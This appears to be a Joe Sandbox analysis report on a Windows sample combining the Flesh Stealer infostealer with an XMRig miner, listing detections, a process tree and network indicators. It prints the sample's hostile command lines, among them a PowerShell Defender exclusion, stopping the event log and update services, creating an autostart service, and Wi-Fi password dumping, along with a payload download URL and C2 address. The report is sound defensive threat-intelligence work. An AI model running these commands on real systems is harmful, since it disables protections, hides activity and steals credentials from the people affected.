Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
System.exe

Overview

General Information

Sample name:System.exe
Analysis ID:1512274
MD5:043c5d0495cd21a75fdf7a2ab4ae0d2c
SHA1:8b63a7b39c56368cd4ee15b343141dd0b5c5fdc9
SHA256:b231b582f0d9cf452ff24d38b33ab6cff59ce035275653cc79526e832d0f5849
Infos:

Detection

Flesh Stealer, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Flesh Stealer
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Uses powercfg.exe to modify the power settings
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • System.exe (PID: 6804 cmdline: "C:\Users\user\Desktop\System.exe" MD5: 043C5D0495CD21A75FDF7A2AB4AE0D2C)
    • zxcvbnmasd.exe (PID: 2360 cmdline: "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" MD5: B0601C9443DD3B7A6B02EE764791C9AD)
      • powershell.exe (PID: 3312 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 8648 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • wusa.exe (PID: 8720 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: E43499EE2B4CF328A81BACE9B1644C5D)
      • sc.exe (PID: 8664 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 8776 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 8828 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 8880 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 8932 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powercfg.exe (PID: 8984 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 9000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powercfg.exe (PID: 8992 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 9016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powercfg.exe (PID: 9008 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 9080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powercfg.exe (PID: 9068 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 9124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 9112 cmdline: C:\Windows\system32\sc.exe delete "NUOIJWEW" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 9172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 6264 cmdline: C:\Windows\system32\sc.exe create "NUOIJWEW" binpath= "C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 8528 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 8356 cmdline: C:\Windows\system32\sc.exe start "NUOIJWEW" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6836 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 5160 cmdline: chcp 65001 MD5: CA9A549C17932F9CAA154B5528EBD8D4)
      • netsh.exe (PID: 5620 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 7056 cmdline: findstr All MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  • gfqyepapamry.exe (PID: 8380 cmdline: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe MD5: B0601C9443DD3B7A6B02EE764791C9AD)
    • powershell.exe (PID: 8548 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3056 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • wusa.exe (PID: 8476 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: E43499EE2B4CF328A81BACE9B1644C5D)
    • sc.exe (PID: 2528 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 4548 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 5816 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 5660 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 8588 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 8644 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 6416 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 7968 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 8660 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • conhost.exe (PID: 8744 cmdline: C:\Windows\system32\conhost.exe MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • svchost.exe (PID: 6376 cmdline: svchost.exe MD5: F586835082F632DC8D9404D83BC16316)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.295346194625.00000176A1193000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FleshStealerYara detected Flesh StealerJoe Security
      00000000.00000002.295346194625.00000176A0FCE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FleshStealerYara detected Flesh StealerJoe Security
        00000000.00000002.295340608074.0000017690547000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FleshStealerYara detected Flesh StealerJoe Security
          00000041.00000002.296341625533.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000041.00000002.296341625533.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
            • 0x37eb98:$a1: mining.set_target
            • 0x370e20:$a2: XMRIG_HOSTNAME
            • 0x373748:$a3: Usage: xmrig [OPTIONS]
            • 0x370df8:$a4: XMRIG_VERSION
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            65.2.svchost.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              65.2.svchost.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
              • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
              • 0x3cd180:$s3: \\.\WinRing0_
              • 0x376148:$s4: pool_wallet
              • 0x3705f0:$s5: cryptonight
              • 0x370600:$s5: cryptonight
              • 0x370610:$s5: cryptonight
              • 0x370620:$s5: cryptonight
              • 0x370638:$s5: cryptonight
              • 0x370648:$s5: cryptonight
              • 0x370658:$s5: cryptonight
              • 0x370670:$s5: cryptonight
              • 0x370680:$s5: cryptonight
              • 0x370698:$s5: cryptonight
              • 0x3706b0:$s5: cryptonight
              • 0x3706c0:$s5: cryptonight
              • 0x3706d0:$s5: cryptonight
              • 0x3706e0:$s5: cryptonight
              • 0x3706f8:$s5: cryptonight
              • 0x370710:$s5: cryptonight
              • 0x370720:$s5: cryptonight
              • 0x370730:$s5: cryptonight
              65.2.svchost.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
              • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
              65.2.svchost.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
              • 0x37ef98:$a1: mining.set_target
              • 0x371220:$a2: XMRIG_HOSTNAME
              • 0x373b48:$a3: Usage: xmrig [OPTIONS]
              • 0x3711f8:$a4: XMRIG_VERSION

              Sigma Signatures

              Change of critical system settings

              barindex
              Sigma detected: Disable power options
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe, ParentProcessId: 2360, ParentProcessName: zxcvbnmasd.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 8984, ProcessName: powercfg.exe

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe, ParentProcessId: 2360, ParentProcessName: zxcvbnmasd.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3312, ProcessName: powershell.exe
              Sigma detected: Suspect Svchost Activity
              Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe, ParentImage: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe, ParentProcessId: 8380, ParentProcessName: gfqyepapamry.exe, ProcessCommandLine: svchost.exe, ProcessId: 6376, ProcessName: svchost.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe, ParentProcessId: 2360, ParentProcessName: zxcvbnmasd.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3312, ProcessName: powershell.exe
              Sigma detected: Uncommon Svchost Parent Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe, ParentImage: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe, ParentProcessId: 8380, ParentProcessName: gfqyepapamry.exe, ProcessCommandLine: svchost.exe, ProcessId: 6376, ProcessName: svchost.exe
              Sigma detected: New Service Creation Using Sc.EXE
              Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "NUOIJWEW" binpath= "C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "NUOIJWEW" binpath= "C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe, ParentProcessId: 2360, ParentProcessName: zxcvbnmasd.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "NUOIJWEW" binpath= "C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe" start= "auto", ProcessId: 6264, ProcessName: sc.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe, ParentProcessId: 2360, ParentProcessName: zxcvbnmasd.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3312, ProcessName: powershell.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe, ParentImage: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe, ParentProcessId: 8380, ParentProcessName: gfqyepapamry.exe, ProcessCommandLine: svchost.exe, ProcessId: 6376, ProcessName: svchost.exe

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Sigma detected: Stop EventLog
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe, ParentProcessId: 2360, ParentProcessName: zxcvbnmasd.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 8528, ProcessName: sc.exe

              Stealing of Sensitive Information

              barindex
              Sigma detected: Capture Wi-Fi password
              Source: Process startedAuthor: Joe Security: Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\System.exe", ParentImage: C:\Users\user\Desktop\System.exe, ParentProcessId: 6804, ParentProcessName: System.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 6836, ProcessName: cmd.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-17T03:59:57.809842+020020362892Crypto Currency Mining Activity Detected192.168.11.20499891.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-09-17T03:59:46.294107+020028269302Crypto Currency Mining Activity Detected192.168.11.2049760142.202.242.43443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://utka.xyz/1234.exeAvira URL Cloud: Label: malware
              Multi AV Scanner detection for domain / URL
              Source: utka.xyzVirustotal: Detection: 6%Perma Link
              Source: pool.hashvault.proVirustotal: Detection: 7%Perma Link
              Source: https://utka.xyz/1234.exeVirustotal: Detection: 8%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeVirustotal: Detection: 81%Perma Link
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeReversingLabs: Detection: 87%
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeReversingLabs: Detection: 87%
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeVirustotal: Detection: 81%Perma Link
              Multi AV Scanner detection for submitted file
              Source: System.exeReversingLabs: Detection: 67%
              Source: System.exeVirustotal: Detection: 45%Perma Link
              Machine Learning detection for sample
              Source: System.exeJoe Sandbox ML: detected

              Bitcoin Miner

              barindex
              Yara detected Xmrig cryptocurrency miner
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 65.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000041.00000002.296341625533.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Found strings related to Crypto-Mining
              Source: svchost.exeString found in binary or memory: cryptonight-monerov7
              Source: unknownHTTPS traffic detected: 191.101.104.168:443 -> 192.168.11.20:49759 version: TLS 1.2
              Source: System.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: gfqyepapamry.exe, 00000028.00000003.295204672211.00000249E5D10000.00000004.00001000.00020000.00000000.sdmp

              Networking

              barindex
              Performs DNS queries to domains with low reputation
              Source: DNS query: utka.xyz
              Source: global trafficTCP traffic: 192.168.11.20:49762 -> 89.23.100.233:9003
              Source: global trafficHTTP traffic detected: GET /1234.exe HTTP/1.1Host: utka.xyzConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 104.16.185.241 104.16.185.241
              Source: Joe Sandbox ViewIP Address: 142.202.242.43 142.202.242.43
              Source: Joe Sandbox ViewASN Name: ASDETUKhttpwwwheficedcomGB ASDETUKhttpwwwheficedcomGB
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: icanhazip.com
              Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.11.20:49989 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.11.20:49760 -> 142.202.242.43:443
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
